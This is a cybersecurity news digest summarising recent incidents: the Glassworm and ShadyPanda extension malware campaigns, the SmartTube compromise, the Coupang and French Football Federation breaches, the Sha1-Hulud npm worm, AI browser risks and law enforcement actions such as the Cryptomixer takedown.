Daily Brief

Glassworm malware has reappeared in the OpenVSX and Microsoft Visual Studio marketplaces, introducing 24 new malicious packages targeting developers. Initially identified by Koi Security, Glassworm conceals its code using invisible Unicode characters, making detection difficult during code reviews. The malware aims to steal sensitive information, including GitHub, npm, and cryptocurrency wallet data, and deploys a SOCKS proxy for malicious traffic routing. Researchers discovered Glassworm's evolution, now using Rust-based implants within extensions, and continuing to manipulate download counts to enhance legitimacy. Secure Annex's John Tuckner identified the malware's broad targeting of popular developer frameworks such as Flutter, React Native, and Vue. Despite previous containment efforts, Glassworm has returned, prompting further investigation and response from OpenVSX and Microsoft. The ongoing threat of Glassworm underscores the need for robust security measures in software marketplaces to protect developers and their environments.

A seven-year campaign by ShadyPanda infected 4.3 million Chrome and Edge users with malware, utilizing extensions to deploy backdoors and spyware. These extensions initially appeared legitimate, gaining trust with high install counts and favorable reviews before deploying malicious updates. The malware facilitated extensive surveillance, capturing browsing data, injecting content, and executing remote code with full browser API access. Despite removal from Chrome and Edge stores, the infrastructure for potential attacks remains active on infected browsers. Google confirmed the removal of these extensions from its store, while Microsoft has not commented on their status in the Edge marketplace. The campaign's success highlights vulnerabilities in extension review processes, where updates are not continuously monitored post-approval. ShadyPanda's activities include earlier campaigns that monetized user data through affiliate tracking and browser hijacking. The ongoing threat emphasizes the need for improved oversight and security measures in browser extension marketplaces.

The SmartTube YouTube client for Android TV was compromised after an attacker accessed the developer's signing keys, leading to a malicious update. Users reported Play Protect blocking SmartTube, indicating a risk, prompting the developer to acknowledge the breach and plan a new version release. The compromised app version 30.51 contains a suspicious library, libalphasdk.so, which fingerprints devices and communicates with a remote backend without user awareness. Although no direct malicious activities like account theft have been reported, the potential for such activities remains significant. Developer Yuriy Yuliskov has announced safe beta and stable test builds but has not yet updated the official GitHub repository, causing trust issues. Users are advised to use older safe builds, avoid premium account logins, and disable auto-updates until a detailed post-mortem is available. Affected users should reset Google Account passwords, check for unauthorized access, and remove unrecognized services to mitigate risks. The exact timeline of the breach and which app versions are safe remain unclear, pending further investigation and communication from the developer.

South Korean authorities arrested four individuals for compromising over 120,000 IP cameras, targeting sensitive locations to create and sell illicit videos online. The suspects exploited weak factory passwords to access cameras, earning significant profits from selling footage on an undisclosed website. Australian Federal Police sentenced a man to over seven years for creating fake Wi-Fi networks at airports, stealing credentials to access victims' accounts and personal data. The Australian offender attempted to erase digital evidence and improperly accessed his employer's systems during the investigation. In England, a man was sentenced for running a dark web drug operation, distributing various illegal substances from his rural home. Authorities emphasize the importance of robust password practices and caution when using public Wi-Fi to prevent such cyber threats. These cases illustrate the global reach and diverse methods of cybercriminals, necessitating coordinated international law enforcement efforts.

India's telecommunications ministry mandates pre-installation of the Sanchar Saathi app on all new mobile devices within 90 days to combat telecom fraud and enhance cybersecurity. The app, which cannot be removed or disabled, enables users to report fraud, spam, and malicious links, block stolen handsets, and check mobile connections under their name. A key feature allows reporting of international calls disguised as domestic, aiding government actions against illegal telecom setups that threaten national security. Since its May 2023 launch, the app has been installed over 11.4 million times, blocking 4.2 million lost devices and recovering over 723,000. The directive requires manufacturers to update existing supply chain phones with the app, addressing threats like spoofed IMEI numbers used in scams. This move aligns India with countries like Russia, which also mandates pre-installed apps for cybersecurity, though critics raise concerns over potential user tracking. The initiative reflects growing global trends in government-led cybersecurity measures amidst increasing telecom fraud and security threats.

ShadyPanda, a threat actor, turned legitimate browser extensions into spyware, impacting over 4.3 million users globally, according to Koi Security's report. Five extensions, initially verified by Google, were modified in mid-2024 to execute remote code, exfiltrating browsing data and monitoring user activity. The extensions engaged in affiliate fraud by injecting tracking codes on e-commerce sites, generating illicit commissions from user purchases. The attack evolved to include browser hijacking, redirecting search queries through a known hijacker site, and exfiltrating cookies for profit. Extensions utilized extensive obfuscation and adversary-in-the-middle techniques, enabling credential theft and session hijacking without user suspicion. Despite the removal of some extensions, others like WeTab remain available, continuing to facilitate comprehensive surveillance on user activities. Users are advised to uninstall affected extensions and change credentials to mitigate potential data breaches and unauthorized access risks. The campaign underscores the need for continuous monitoring of browser extensions post-approval to prevent exploitation through trusted update mechanisms.

Coupang, South Korea's largest retailer, experienced a data breach affecting 33.7 million customers, exposing personal data such as names, phone numbers, and addresses. The breach was discovered on November 18, 2025, though the unauthorized access occurred on June 24, 2025, indicating a significant delay in detection. Payment information, including credit card data and passwords, was reportedly not compromised during the breach, limiting financial exposure for customers. Coupang has informed relevant authorities, including the National Police Agency and the Personal Information Protection Commission, and is notifying affected customers via email and SMS. The breach reportedly involved a former employee exploiting unrevoked access tokens, although these details remain unconfirmed by all sources. This incident marks the second major cybersecurity breach in South Korea this year, following a similar large-scale event at SK Telecom. Customers are advised to be vigilant against phishing attempts and communications impersonating Coupang, as the breach increases the risk of social engineering attacks.

Cybercriminals are posing as cybersecurity and IT professionals to gain insider access, manipulating the hiring process to infiltrate organizations and access sensitive data. These imposters create fake personas using deepfake technology and fabricated resumes, exploiting remote work environments to bypass traditional identity verification. The primary objectives of these fake workers include data theft, financial fraud, and cyber espionage, posing significant risks to company reputation and compliance. North Korean operatives have been identified using fake identities to secure remote tech jobs, generating illicit revenue and exfiltrating sensitive information. Companies are advised to implement multi-factor identity validation, thorough background checks, and secure onboarding protocols to mitigate these threats. Advanced technical controls such as network segmentation, user activity monitoring, and hardware-based multi-factor authentication are recommended to enhance security. Managed Service Providers face heightened risks due to their access to multiple client systems, necessitating stringent security measures and tailored incident response plans. Continuous security awareness training and vigilance for warning signs can help organizations protect against these sophisticated insider threats.

ShadyPanda, a long-running malware campaign, has infected over 4.3 million users through Chrome and Edge browser extensions, initially appearing as legitimate productivity tools. Koi Security discovered the operation, which evolved in phases, introducing spyware capabilities to extensions that initially seemed harmless. The campaign includes 145 extensions, with 125 on Edge and 20 on Chrome; Google has removed these from its store, but some remain on the Edge platform. Extensions engaged in affiliate fraud by injecting tracking codes into e-commerce links, generating illicit revenue from user purchases. A backdoor was introduced in 2024, enabling remote code execution and data exfiltration, including browsing URLs and user identifiers, using AES encryption. The campaign's final phase involves five Edge extensions, accumulating 4 million installs, with spyware components sending data to 17 domains in China. Users are advised to uninstall these extensions and reset passwords to mitigate potential security risks, as the campaign remains active on Microsoft Edge.

A Dutch government report finds that teenage cybercriminals typically abandon illegal activities by age 20, with only a small percentage continuing into adulthood. The study compares teenage cyber offenses to other crimes like drug and weapon offenses, noting they are among the least common adolescent crimes. Research shows that young cybercriminals often reach peak activity around age 20, though this can vary slightly by decade. Only about 4% of teenage offenders continue cybercriminal activities beyond their early 20s, often due to a sustained interest in technology. The report acknowledges the lack of comprehensive longitudinal data on cybercrime, making it challenging to assess its social cost accurately. The Netherlands faces an annual social cost of €10.3 billion from adolescent crime, with cybercrime contributing significantly despite being hard to quantify. A UK study highlights the economic impact of cybercrime, with major hospital attacks costing approximately £11.14 million annually, underscoring its financial burden. The Dutch government's reluctance to quantify cybercrime costs reflects the complexity of measuring impacts like intellectual property theft and psychological effects.

Coupang, South Korea's largest retail platform, confirmed a breach affecting 33.7 million customers, exposing personal details such as names, emails, phone numbers, and shipping addresses. The breach, initially detected on November 18, was traced back to June 24, with unauthorized access originating from overseas servers, compromising more than half of South Korea's population. Coupang reported the incident to local authorities, including the National Police Agency and the Korea Internet & Security Agency, and has enhanced internal security measures. The breach did not compromise login credentials or payment card details, which remain secure according to Coupang's statement. Local media suggest the breach may involve a former Coupang employee who allegedly used an active authentication key post-resignation to leak data. Coupang has warned customers to be vigilant against phishing attempts and issued public apologies for the incident's impact. The breach follows a recent incident involving SK Telecom, highlighting vulnerabilities in South Korea's major commerce and communication sectors. Coupang's response includes engaging an independent security firm to investigate, though the company has not disclosed the firm's identity.

A self-replicating worm named "Sha1-Hulud: The Second Coming" attacked the npm registry, affecting over 800 packages and 27,000 GitHub repositories. The malware aimed to steal sensitive data, including API keys and authentication information, facilitating deeper supply chain compromises. It created GitHub Actions workflows for command-and-control operations and injected malicious payloads into npm packages. By dynamically installing Bun during package installation, the malware evaded traditional defenses focused on Node.js behavior. GitGuardian identified 294,842 secret occurrences, with 3,760 valid secrets, including GitHub tokens and AWS IAM keys. Trigger.dev reported credential theft and unauthorized access to its GitHub organization due to the installation of a compromised package. The Python Package Index (PyPI) confirmed it was not impacted by this supply chain incident.

The rise of agentic AI browsers introduces a shift from passive viewing tools to autonomous digital agents, altering the traditional threat landscape. These AI browsers, such as OpenAI's ChatGPT Atlas, can autonomously execute tasks, requiring elevated privileges that increase vulnerability. The need for maximum privileges creates a vast attack surface, as AI agents require access to sensitive user data, including session cookies and credentials. Malicious actors can exploit these browsers through prompt injection, bypassing standard security measures like Multi-Factor Authentication. Traditional security tools struggle to detect threats within AI browsers, as activities occur locally and are masked by encrypted traffic. Organizations must recognize agentic browsers as a distinct endpoint risk and adapt their security strategies accordingly. Security leaders are encouraged to attend specialized webinars to gain insights into securing AI browsers and mitigating associated risks.

The French Football Federation (FFF) experienced a data breach through a compromised account, affecting its member management software and exposing player data. The breach involved the unauthorized access of personal information, including names, birth details, contact information, and license numbers of members. The FFF swiftly disabled the compromised account, reset all user passwords, and secured the software to prevent further unauthorized access. No financial or national identity data was compromised, minimizing potential financial fraud risks for affected individuals. The FFF has filed a criminal complaint and informed French cybersecurity and data protection authorities, ANSSI and CNIL, to address the incident. Members have been advised to exercise caution with emails claiming to be from the FFF, especially those requesting sensitive information or containing attachments. The breach highlights the need for robust cybersecurity measures as the FFF enhances its defenses against the rising tide of cyber threats.

Swiss and German authorities dismantled Cryptomixer, a cryptocurrency mixing service, seizing three servers and €24 million in Bitcoin, with support from Europol and Eurojust. Cryptomixer was used by cybercriminals to obscure the origins of funds, aiding activities such as ransomware, drug trafficking, and payment card fraud. The service operated on both the clear and dark web, providing anonymity by pooling and redistributing cryptocurrency to hinder traceability. This action follows a similar takedown of ChipMixer in March 2023, where authorities seized servers and $46.5 million in Bitcoin. Crypto mixers are often used by criminals to launder funds before converting them into fiat currency, despite having some legitimate applications. The crackdown on crypto mixers continues globally, with recent legal actions against operators of similar services like Samourai Wallet and Blender.io. These efforts aim to disrupt the financial infrastructure supporting cybercrime and enhance the traceability of illicit cryptocurrency transactions.